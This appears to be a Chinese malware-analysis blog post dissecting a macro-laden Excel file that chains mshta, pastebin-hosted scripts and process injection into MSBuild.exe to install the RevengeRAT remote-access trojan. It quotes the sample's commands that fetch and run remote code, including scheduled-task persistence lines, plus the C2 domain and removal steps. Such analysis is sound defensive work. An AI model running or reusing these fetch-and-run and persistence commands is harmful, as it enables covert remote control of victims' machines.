<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="安全行业从业者，主要方向PC逆向附带安卓和Linux逆向，时不时喜欢写点BUG代码">
  <meta name="author" content="Cray">
  <meta name="keywords" content="">
  <title>Lunlayloo 木马 ~ 逆向安全博客</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css"  >

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link rel="stylesheet" href="/lib/prettify/tomorrow.min.css"  >

<link rel="stylesheet" href="/css/main.css"  >


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css"  >


<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">


    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" false
      style="background: url('https://dc.snscz.com/s2/img/original/2019/04/01/14/14004_b10b643428.jpg') no-repeat center center;
      background-size: cover;">
    
        <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
                Lunlayloo 木马
              
            </span>

            
              <br>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    1k 字
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      3 分钟
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>&nbsp;
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h2 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h2><table>
<thead>
<tr>
<th>FileName</th>
<th>FileType</th>
<th>MD5</th>
<th>Size</th>
</tr>
</thead>
<tbody><tr>
<td>Order____679873892.xls</td>
<td>rat</td>
<td>7641FEF8ABC7CB24B66655D11EF3DAF2</td>
<td>41472 bytes</td>
</tr>
</tbody></table>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>该样本语言类型为 VBS和JS编写，中间过程完全使用无文件格式，内容也都能随时在线更改，在一定程序上能躲避安全软件的查杀，通过不同混淆更容易达到免杀的效果。</p>
<h2 id="流程图"><a href="#流程图" class="headerlink" title="流程图"></a>流程图</h2><p><img src="https://img-blog.csdnimg.cn/20190920124614242.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<h2 id="详细分析"><a href="#详细分析" class="headerlink" title="详细分析"></a>详细分析</h2><p>文件有宏，且宏有密码，可以使用<code>offkey</code>直接更改宏密码<br>进入宏代码后在<code>shell(fun)</code>处下断，可以拿到shell 的连接地址<br><img src="https://img-blog.csdnimg.cn/20190916212336956.png" srcset="/img/loading.gif" alt="在这里插入图片描述"> <code>mshta http://bit.ly/8hsshjahassahsh</code></p>
<p>打开这个页面看似是一个正常页面，但仔细查找是能在源码中找到恶意js代码的<br><img src="https://img-blog.csdnimg.cn/20190917141638561.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>拿出来使用<code>console</code>打印出来<br><img src="https://img-blog.csdnimg.cn/20190917141856253.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20190917143320931.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>处理后执行了<code>WScript.Shell.Run mshta http://www.pastebin.com/raw/nv5d9pYu,vbHide</code><br>看看究竟是什么东西<br>木马作者选择了一个匿名代码存放地址网站，来逃避追踪。<br>但是目前这个RWA地址页面已经被删除了<br><img src="https://img-blog.csdnimg.cn/20190917143741625.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>这个样本在any.run上有人运行过，有记录，所以可以找到这个访问记录。<br><a target="_blank" rel="noopener" href="https://app.any.run/tasks/0100486e-1711-4af6-a437-74ad27216f36/">https://app.any.run/tasks/0100486e-1711-4af6-a437-74ad27216f36/</a><br><img src="https://img-blog.csdnimg.cn/20190917144032656.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>拿出这个代码<br><img src="https://img-blog.csdnimg.cn/20190917144558325.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>下面看看怎么玩的，关闭打开的excel word ppt msp软件，让中马的人以为想不到是宏的原因，给人 眼部见为净 的感觉</p>
<p><img src="https://img-blog.csdnimg.cn/20190917151722331.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p>接着又安装两个计划任务，来持久化攻击和进一步执行操作</p>
<p><code>schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe http://pastebin.com/raw/vXpe74L2 /F</code><img src="https://img-blog.csdnimg.cn/20190917154541622.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><code>schtasks /create /sc MINUTE /mo 300 /tn Update /tr mshta.exe http://pastebin.com/raw/JdTuFmc5 /F</code><br><img src="https://img-blog.csdnimg.cn/20190917154555627.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>通过schtasks  创建两个计划任务来执行两个脚本文件<br>还加入了一个开启自启动<br><img src="https://img-blog.csdnimg.cn/2019091715561730.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p>接下来看看这三个脚本是怎么操作的</p>
<p><code>JdTuFmc5</code> 又是一系列加密，下面是解密后的结果</p>
<p><img src="https://img-blog.csdnimg.cn/20190919105945345.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>尝试去下载并执行两个.net编写的可执行程序，暂时命名为<code>bit1.bin</code>和<code>2bit1.bin</code>后面分析</p>
<p>在<code>wMG90xwi</code>这个raw中定义了一个<code>$a</code>对象，这个对象是将上面的bit1.bin读入内存的对象，可以直接使用<br><img src="https://img-blog.csdnimg.cn/20190919105430408.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>使用dnspy打开反编译这个dll</p>
<p>里面就有<code>THC452563sdfdsdfgr4777cxg04477fsdf810df777</code>类和它的方法<code>retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe(string FTONJ, byte[] coco)</code> </p>
<p><img src="https://img-blog.csdnimg.cn/20190919110436546.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>然后使用<code>Invoke</code>去调用了这个方法，且传入的参数是(‘MSBuild.exe’,$f)</p>
<p>查一下壳，发现是加了<code>Confuser</code>的混淆</p>
<p>解完混淆之后再看<br><img src="https://img-blog.csdnimg.cn/20190920183121543.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>会按照顺序去检测文件<code>MSBuild.exe</code>存在在哪，然后调用<code>ticklens</code><br><img src="https://img-blog.csdnimg.cn/20190920183342286.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><code>PEHeaderE</code>函数是在修改程序自身代码<br><img src="https://img-blog.csdnimg.cn/20190920184816602.png" srcset="/img/loading.gif" alt="在这里插入图片描述">主要看<code>FUN</code><br><img src="https://img-blog.csdnimg.cn/20190920184846835.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>发现是在循环调用<code>smethod_0</code>方法，这个方法就是真正的创建傀儡进程</p>
<p><code>lpname</code> 指向要打开的进程</p>
<p><code>lpBuf</code> 是要注入的数据</p>
<p><img src="https://img-blog.csdnimg.cn/20190920185315420.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/2019092018553021.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20190920185552483.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20190920185722874.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20190920185657512.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20190920185749272.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>上面就是典型的进程注入  作用是将第二个可执行程序注入到<code>MSBuild.exe</code>中</p>
<p>这里就直接看一下 这个注入的程序到底是什么</p>
<p>反编译下一个2bit2.bin</p>
<p>根据关键字搜索，可以发现这是<code>RevengeRAT </code>远控生成的客户端<br><img src="https://img-blog.csdnimg.cn/20190920111854823.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>这个远控是一个有免费版本，网络上也有泄露的版本，因为是.net编写，基本功能也都能识别出来</p>
<p>首先是C2地址 <code>meandmyjoggar.duckdns.org:777</code></p>
<p>程序互斥体名 <code>RV_MUTEX-WindowsUpdateSysten32</code></p>
<p>两个计划任务和加入的启动项注册表都是一样的程序，这里就不累述了</p>
<p><strong>总的来说就是将远控代码注入到一个正常的程序中，来达到执行且躲避安全软件</strong></p>
<h2 id="IOC"><a href="#IOC" class="headerlink" title="IOC"></a>IOC</h2><table>
<thead>
<tr>
<th>域名</th>
<th>类型</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="http://www.pastebin.com/raw/nv5d9pYu">http://www.pastebin.com/raw/nv5d9pYu</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/vXpe74L2">http://pastebin.com/raw/vXpe74L2</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/JdTuFmc5">http://pastebin.com/raw/JdTuFmc5</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/CGe3S2Vf">http://pastebin.com/raw/CGe3S2Vf</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pastebin.com/raw/wMG90xwi">https://pastebin.com/raw/wMG90xwi</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pastebin.com/raw/W455MkAZ">https://pastebin.com/raw/W455MkAZ</a></td>
<td>C&amp;C</td>
</tr>
<tr>
<td>meandmyjoggar.duckdns.org:777</td>
<td>C&amp;C</td>
</tr>
</tbody></table>
<h2 id="查杀方案"><a href="#查杀方案" class="headerlink" title="查杀方案"></a>查杀方案</h2><p>关闭<code>MSBuild.exe</code>进程<br>删除计划任务名为<code>Windows Update</code>和<code>Update</code>的任务<br>删除<code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate</code>表项<br>删除<code>Order____679873892.xls</code></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>感染链复杂，控制解密繁琐，多方面控制持久化操作，无文件攻击，技术含量高。个人以及企业中需要时刻面对各种威胁，要时刻保持警惕，防患于未然。</p>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/%E6%A0%B7%E6%9C%AC%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/">样本详细分析</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/Rat-H-worm/">Rat H-worm</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container">
        <div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>
      </div>
    
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>
      var disqus_config = function () {
        this.page.url = 'http://cve.gitee.io/cve/2019/09/06/Lunlayloo 木马/';
        this.page.identifier = '/2019/09/06/Lunlayloo 木马/';
      };
      var oldLoad = window.onload;
      window.onload = function () {
        var d = document, s = d.createElement('script');
        s.type = 'text/javascript';
        s.src = '//' + 'crayon-1' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
      };
    </script>
    <noscript>Please enable JavaScript to view the <a target="_blank" href="https://disqus.com/?ref_noscript" rel="nofollow noopener noopener">comments
        powered by Disqus.</a></noscript>
  </div>


    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv"></span>总访问量 
          <span id="busuanzi_value_site_pv"></span> 次&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv"></span>总访客数 
            <span id="busuanzi_value_site_uv"></span> 人&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script src="/js/main.js" ></script>


  <script src="/js/lazyload.js" ></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var main = $('main');
      var tocT = navHeight + (toc.offset().top - main.offset().top);
      var tocLimMin = main.offset().top - navHeight;
      var tocLimMax = $('#comments').offset().top - navHeight;
      $(window).scroll(function () {
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;
        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': tocT,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
    });
  </script>







  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>


<!-- Plugins -->



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>





  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
